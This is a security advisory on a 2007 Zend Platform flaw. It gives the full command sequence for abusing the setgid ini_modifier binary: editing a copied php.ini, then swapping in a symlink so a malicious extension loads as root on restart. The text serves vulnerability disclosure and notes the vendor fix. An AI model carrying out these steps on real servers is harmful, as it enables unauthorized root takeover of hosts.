Zend Platform comes with an ini_modifier that is used by the GUI to alter the php.ini file. By abusing a vulnerability within the ini_modifier it is possible for a local attacker to edit the php.ini file without knowing the necessary GUI password. This can be used to obtain root privileges by for example adding a malicious PHP extension into the php.ini and waiting for the next server restart.
During the installation of the Zend Platform a suid group binary called ini_modifier is installed.
$ ls -la /usr/local/Zend/sbin/ini_modifier
-rwxr-sr-x 1 root zendtech 243240 2006-08-14 16:24 ini_modifier
The purpose of this binary is to edit the system wide php.ini file from within the GUI. To protect ini_modifier from abuse it first prompts for the GUI password before it lets you edit anything. While it is possible to read the MD5 hash of the GUI password from the php.ini and crack it with a dictionary or rainbowtable attack, there is an even simpler method that exploits a vulnerability within the ini_modifier.
Because the ini_modifier can be told to open an alternative php.ini file with the parameter -f it is possible to edit a copy of the system php.ini if we change the Zend GUI password in it with an editor.
$ cd /tmp
$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
... now edit zend_gui_password in the copy to a MD5 of your choice and
... REMEBER the old MD5
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
In a parallel session you now perform the following
$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini
And continue to edit the ini file
$ cat /usr/local/Zend/etc/php.ini
The next time the webserver is restarted the injected malicious Zend Extension will be loaded and executed with root permissions.
Proof of concept, exploit or instructions to reproduce
This issue was disclosed to Zend at the end of January 2007. Meanwhile Zend provides an update for the ini_modifier on their site. However their recommendation is to upgrade to Zend Platform 3.0.